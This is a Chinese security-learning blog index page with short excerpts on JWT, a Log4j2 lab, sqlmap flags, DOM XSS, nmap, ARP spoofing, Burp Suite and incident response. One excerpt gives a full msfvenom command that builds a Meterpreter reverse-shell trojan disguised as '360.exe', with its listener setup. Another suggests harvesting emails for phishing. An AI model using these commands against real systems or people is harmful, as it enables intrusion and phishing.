renyizou的博客

环境搭建使用docker容器搭建webgoat环境什么是JWTJson web token (JWT), 是为了在网络应用环境间传递声明而执行的一种基于JSON的开放标准.该token被设计为紧凑且安全的，特别适用于分布式站点的单点登录（单点登录SSO：在多个应用系统中，只需要登录一次，就可以访问其他相互信任的应用系统。）场景。JWT的声明一般被用来在身份提供者和服务提供者间传递被认证的用户身份信息，以便于从资源服务器获取资源，也可以增加一些额外的其它业务逻辑所必须的声明信息，该token也可直

1.知识科普名词解释开源：开放源代码，指一种软件发布模式。开源也有可能会有一定的限制，如现值阅读源代码的对象，限制衍生品等 黑客：源自英文hacker。骇客与黑客不同，最初指热心于计算机技术，水平高超的电脑高手 骇客（黑帽子）：以个人意志为出发点，攻击网络或计算机 白帽子：专门研究或从事网络安全的人，是提高网络、系统安全水平的主要力量 灰帽子：介于两者之间脚本： ASP即Active Server Pages，服务器端脚本环境，可用来创建动态交互式网页并建立强大的 web应用程序

靶场：Vulfocus 靶场环境目前 Vulfocus 已经集成 Log4j2 环境，可通过以下链接启动环境测试：http://vulfocus.fofa.so/#/dashboard?image_id=3b8f15eb-7bd9-49b2-a69e-541f89c4216c也可通过 docker pull vulfocus/log4j2-rce-2021-12-09:latest 拉取本地环境运行。漏洞复现：我是本地复现：环境:*服务器地址：kali ip（192.168.30.1

归纳转载于：应急响应的整体思路和基本流程 - FreeBuf网络安全行业门户不管是普通的企业，还是专业的安全厂商，都不可避免的需要掌握和运用好信息安全的知识、技能，以便在需要的时候，能够御敌千里。https://www.freebuf.com/articles/endpoint/192859.html应急响应之windows入侵排查篇 - FreeBuf网络安全行业门户本文主要讨论windows被入侵后的排查思路。https://www.freebuf.com/articles/network/28

转载mark一下https://xz.aliyun.com/t/9542https://xz.aliyun.com/t/9542

常见存在注入的点cookie get的参数 post参数（通常是在包的下面）sqlmap参数-u 检测url地址，浅绿色标注--dbs 所有数据库--current-db 当前应用使用的数据库名是什么-D 数据库名 --tables 查看所有表-T users 看users表--columns列出表中所有字段和数据的类型-C user,pass 读字段--dump 取值列出-m 取列表里的值挨个去攻击把带有参数的都放一起，批量跑-r

DOM型特征：整个过程都是在前端完成的，没有后端的参与（纯前端的操作！）一次弹框，在div中弹框。二次弹窗，框中">用作封闭前面的input框

windo重点监控windows 安装目录system32 配置文件 config--sam 放置着用户密码，可以导出后清楚或破解（账号登录时是不能打开的） drivers--hosts 绕过cdn时有用，绕waf服务：services.msc注册表：regedit存储系统中应用的一些设置信息color -h改cmd颜色ipconfig /allipconfig /release 释放ipipconfig /r...

migrate 隐藏（依附）进程键盘监控杀进程用户哈希持久化进程通过写入注册表每50秒重连主机的ip一次，走4343端口重启之后自动链接上了查看winxp启动项：开始---运行--输入msconfig -6看看靶机，顺着启动项看了一下就是右上角这个.vbs文件...

theHarvester -d bilibili.com -l 50 -b baidu 找到的邮箱可以用做钓鱼 h要大写 -d 搜索的域名 -l 前多少个（数量） -b 搜索引擎 baidu，bing，yahoo，google

攻击：想要知道攻击的原理就要先搞清楚arp的工作原理。在两台主机通信时，a主机会先从自己的arp缓存表里查找有没有b主机（目标主机）的联系方式，如果有，那就直接封装数据包，直接发送，没有的话，a主机会像全网络广播一个包，询问b主机的mac地址是什么，此时局域网内所有主机都会听到这个包，但是b主机会单独回应，这时，a主机就得到了自己想要的东西，同时会更新自己的arp缓存表。arp协议有个问题，就是这个协议完全时建立在互相信任的基础上的，所以不管是不是合法的应答，只要收到目标mac地址的广播，就会接受并...

一串机器能执行的代码 msfvenom msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.183.202 LPORT=4343 -f exe > 360.exe 生成一个名字叫360.exe的木马 此时还需要一个监听端--msf中的监听模块 use exploit/multi/handler设置好lhost和lpost，记得设置payload，开启监听运行木马就能建立session，直接就进去了linux ..

vmtools的安装 复制到pmt目录下 解压 tar -xzvf vmwaretools-...... cd vmwaretools-distrib ./vmware-install.pl 回车...... enjoy

linux特性：是一个基于POSIX和Unix的多用户，多任务，支持多线程和多CPU的操作系统基本思想Linux的基本思想有两点：第一，一切都是文件；第二，每个文件都有确定的用途。其中第一条详细来讲就是系统中的所有都归结为一个文件，包括命令、硬件和软件设备、操作系统、进程等等对于操作系统内核而言，都被视为拥有各自特性或类型的文件。至于说Linux是基于Unix的，很大程度上也是因为这两者的基本思想十分相近。完全免费Linux是一款免费的操作系统，用户可以通过网络或其他途径免费获得，并可以任意

基础命令详细命令详细分类命令主机发现-iL "文档地址" 默认扫描 溯源常用windows命令 netstat -ano established：表示正在进行数据交互 -iR 5 -p 3306 随机扫描两个IP，扫描其3306端口 -open 扫描开启着的主机？ --exclude 在内网中排除部分地址段 --excludefile 通过文件 在内网中排除部分地址段 -sL 将扫描过的地址打印出来 -sn 不探测端口，只探测主机是否存活nmap.

在百度中搜索WebAliveScan，找到gihub下载 阅读readme.py，看到其中有下载的语句 直接运行，发现报错看红字之前的报错内容以及运行程序发现是gevent这个模块安装错误 重新下载这个模块安装之后就可正常运行了...

如遇到：安装出错 0x80070643https://www.cnblogs.com/emanlee/p/11422646.html

DNS: Domain Name System一个保存IP地址和域名相互映射关系的分布式数据库,重要的互联网基础设施,默认使用的TCP/UDP端口号是53常见DNS记录类型:1AP地址记录,记录一个域名对应的IP地址2AAAA IPV6地址记录,记录一个域名对应的IPv6地址8 CNAME 别名记录,记录一个主机的别名4MX电子邮件交换记录,记录一个邮件域名对应的IP地址,如root@xxxx.com5 NS域名服务器记录,记录该域名由哪台域名服务器解析6 PTR反向记录,也即从IP地址到域名的一条

什么是信息搜集信息搜集也称踩点，信息搜集就是尽可能搜集目标的信息，包括端口信息，DNS信息，员工邮箱等看似并不起眼的一些信息都算是信息搜集。信息搜集的重要性信息搜集是渗透测试的最重要的阶段，占据整个渗透测试的60%,可见信息搜集的重要性。根据收集的有用信息，可以大大提高我们渗透测试的成功率。信息搜集的分类1、主动式信息搜集(可获取到的信息较多,但易被目标发现)2、通过直接发起与被测目标网络之间的互动来获取相关信息，如通过Nmap扫描目标系统。3、被动式信息搜集(搜集到的信息较少

转载自https://t0data.gitbooks.io/burpsuite/content/chapter5.html

抓包老版火狐记得断网安装并取消其自动更新火狐中转发代理的设置抓微信包需要修改ie的设置查看返回包的内容Action--Do intercept--Response to this request数据包中的第一行透露有部分信息字符会采用URL、base64编码做一层简单加密cookie中有网站的部分信息请求包和返回包的顺序是固定的有一个请求包就会有一个返回包抓不到包的情况下，进行排查...